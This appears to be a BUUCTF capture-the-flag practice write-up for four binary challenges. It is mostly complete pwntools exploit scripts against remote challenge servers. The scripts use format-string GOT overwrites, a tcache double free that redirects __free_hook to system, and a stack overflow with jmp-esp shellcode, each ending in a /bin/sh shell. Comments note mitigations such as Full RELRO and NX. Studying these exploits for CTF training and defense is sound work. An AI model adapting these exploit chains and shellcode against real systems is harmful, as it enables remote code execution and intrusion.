PWN-PRACTICE-BUUCTF-21
- wdb_2018_2nd_easyfmt
- ciscn_2019_es_1
- axb_2019_fmt64
- x_ctf_b0verfl0w
wdb_2018_2nd_easyfmt
格式化字符串漏洞
第一次printf通过printf_got将printf的实际地址打印出来,计算libc基地址,得到system的实际地址
第二次printf通过printf_got将printf的实际地址改写为system的实际地址,这样之后的printf实际上是执行的system
第三次输入"/bin/sh\x00",即会执行system("/bin/sh\x00")
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level='debug'
#io=process('./wdb_2018_2nd_easyfmt')
io=remote('node4.buuoj.cn',27039)
elf=ELF('./wdb_2018_2nd_easyfmt')
libc=ELF('./libc-2.23-16-x32.so')
# GOT slot of printf; it is both read (leak) and later written (overwrite).
printf_got=elf.got["printf"]
# Step 1 (leak): the GOT address is placed at the start of the input and
# "%6$s" dereferences it as the 6th format argument, so the reply contains
# the resolved printf address (the 6 is the writeup's offset for this binary).
# NOTE(review): str + p32() concatenation only works on Python 2 pwntools;
# on Python 3 p32() returns bytes and this line raises TypeError.
payload=p32(printf_got)+"%6$s"
io.sendlineafter("repeater?\n",payload)
# Read up to the 0xf7 byte (presumably the high byte of the libc mapping)
# and unpack the last 4 bytes as the little-endian pointer.
printf_addr=u32(io.recvuntil('\xf7')[-4:])
print("printf_addr=="+hex(printf_addr))
# Rebase libc from the leak and derive system() from the same libc build.
libc_base=printf_addr-libc.symbols["printf"]
system_addr=libc_base+libc.symbols['system']
print("system_addr=="+hex(system_addr))
# Step 2 (write): pwntools generates the %n-style payload that stores
# system_addr into printf's GOT slot, again at argument offset 6.
# Defender note: this only succeeds because the GOT is writable; linking
# with Full RELRO (-Wl,-z,relro,-z,now) makes it read-only after load.
payload=fmtstr_payload(6,{printf_got:system_addr})
io.sendline(payload)
# Step 3: the program's next printf(input) now dispatches to system().
io.sendline('/bin/sh\x00')
io.interactive()
ciscn_2019_es_1
tcache
参考:ciscn_2019_es_1
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./ciscn_2019_es_1")
io=remote("node4.buuoj.cn",28810)
elf=ELF("./ciscn_2019_es_1")
libc=ELF("./libc-2.27-18-x64.so")
# Wrappers for the target's menu options 1-4.  The prompt strings are the
# target's own output (including its "compary" spelling) and must match it.
def add(name_size,name,com_call):
    """Option 1: allocate an entry of name_size bytes holding name and com_call."""
    io.sendlineafter("choice:","1")
    io.sendlineafter("the size of compary's name\n",str(name_size))
    io.sendlineafter("input name:\n",name)
    io.sendlineafter("input compary call:\n",com_call)
def show(index):
    """Option 2: print the entry at index."""
    io.sendlineafter("choice:","2")
    io.sendlineafter("input the index:\n",str(index))
def free(index):
    """Option 3: free the entry at index (this prompt has no trailing newline)."""
    io.sendlineafter("choice:","3")
    io.sendlineafter("input the index:",str(index))
def exit():
    """Option 4: quit.  Shadows the builtin exit(); not called in this script."""
    io.sendlineafter("choice:","4")
#gdb.attach(io)
#pause()
# Chunk 0 is larger than the tcache range, presumably so that freeing it
# goes to the unsorted bin and leaves an arena pointer readable -- confirm.
add(0x410,"aaaa","130")#0
add(0x28,"bbbb","131")#1
# Chunk 2 holds the string that is handed to the hook at the very end.
add(0x68,"/bin/sh\x00","132")#2
#pause()
free(0)
#pause()
# Entry 0 is shown after being freed (use-after-free), so the reply carries
# the bin pointer that was written into the freed chunk.
show(0)
# The leaked pointer is taken as main_arena+96; main_arena is assumed to lie
# 0x10 past __malloc_hook in this libc -- that is what the arithmetic encodes.
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-96-0x10-libc.sym["__malloc_hook"]
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]
#pause()
# Entry 1 is freed twice (tcache double free).  Defender note: glibc 2.29+
# detects this ("free(): double free detected in tcache 2"); libc 2.27 here
# does not.
free(1)
#pause()
free(1)
#pause()
# The first reallocation of the 0x28 chunk writes free_hook into its fd
# field; the following allocation consumes the duplicate, and the third one
# is served from __free_hook itself, where system is written.
add(0x28,p64(free_hook),"133")#3
#pause()
add(0x28,"dddd","134")#4
#pause()
add(0x28,p64(system),"135")#5
#pause()
# free(chunk 2) now invokes the hook on the "/bin/sh" chunk.
free(2)
#pause()
io.interactive()
axb_2019_fmt64
格式化字符串漏洞,参考:[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
# -*- coding:utf-8 -*-
from pwn import *
# Debug logging prints every byte sent and received.
context.log_level="debug"
#io=process("./axb_2019_fmt64")
io=remote("node4.buuoj.cn",26526)
elf=ELF("./axb_2019_fmt64")
libc=ELF("./libc-2.23-16-x64.so")
# GOT slot of strlen: read for the leak, then overwritten below.
strlen_got=elf.got["strlen"]
io.recvuntil("Please tell me:")
# Leak: "%9$s" dereferences the 9th format argument; "aaaa" pads the text to
# 8 bytes so the appended GOT address sits in that slot (9/12/13 are the
# writeup's offsets for this binary).
# NOTE(review): str + p64() concatenation is Python 2 pwntools behaviour;
# Python 3 would need bytes throughout this script.
payload="%9$saaaa"+p64(strlen_got)
io.sendline(payload)
# Pointer ends at the 0x7f high byte; take the last 6 bytes, zero-pad to 8.
strlen_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("strlen_addr=="+hex(strlen_addr))
libc_base=strlen_addr-libc.sym["strlen"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))
# Only the low three bytes of the GOT entry are rewritten (byte 2 via %hhn,
# bytes 0-1 via %hn); the upper bytes are assumed to already match.
high_sys=(system>>16)&0xff
low_sys=system&0xffff
io.recvuntil("Please tell me:")
# %<N>c pads the output so the running character count equals the value to
# store.  The "-9" presumably offsets characters the format has already
# produced -- TODO confirm.  The second count is relative to the first, so
# this construction assumes low_sys >= high_sys.
payload="%"+str(high_sys-9)+"c%12$hhn"
payload+="%"+str(low_sys-high_sys)+"c%13$hn"
#print(len(payload))#25
# Pad to 32 bytes (4 slots) so the two addresses land in slots 12 and 13.
payload=payload.ljust(32,"a")
print(len(payload))#32
payload+=p64(strlen_got+2)+p64(strlen_got)#12 13
io.sendline(payload)
io.recvuntil("Please tell me:")
# strlen() on the next input now resolves to system().  Defender note: a
# Full-RELRO binary has a read-only GOT, which blocks this overwrite.
io.sendline(";/bin/sh\x00")
io.sendline("cat flag")
io.interactive()
x_ctf_b0verfl0w
32位elf,NX disabled,堆栈可执行
栈溢出,通过移动栈顶指针esp,实现ret2shellcode
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level='debug'
#io=process('./x_ctf_b0verfl0w')
io=remote('node4.buuoj.cn',27191)
# elf is not referenced below; presumably loading it sets pwntools'
# context (arch/bits) for the asm() call -- confirm.
elf=ELF('./x_ctf_b0verfl0w')
# Address of a "jmp esp" gadget in the binary (writeup's value, fixed only
# because the binary is presumably non-PIE).
jmp_esp=0x08048504
# 20-byte shellcode taken from the writeup.  It executes from the stack,
# which is only possible because NX is disabled on this binary; with NX
# (the default for modern toolchains) the ret2shellcode approach fails.
shellcode="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# Buffer layout: shellcode first, padded to 0x24 bytes, then the saved
# return address replaced by the jmp esp gadget.
payload=shellcode.ljust(0x24,'a')
payload+=p32(jmp_esp)
# After ret, esp points just past the return address, i.e. at this stub.
# It moves esp back 0x28 bytes (0x24 padding + 4-byte address) to the start
# of the buffer and jumps there, so the shellcode runs.
payload+=asm('sub esp, 0x28;jmp esp')
io.recvuntil('name?\n')
io.sendline(payload)
io.interactive()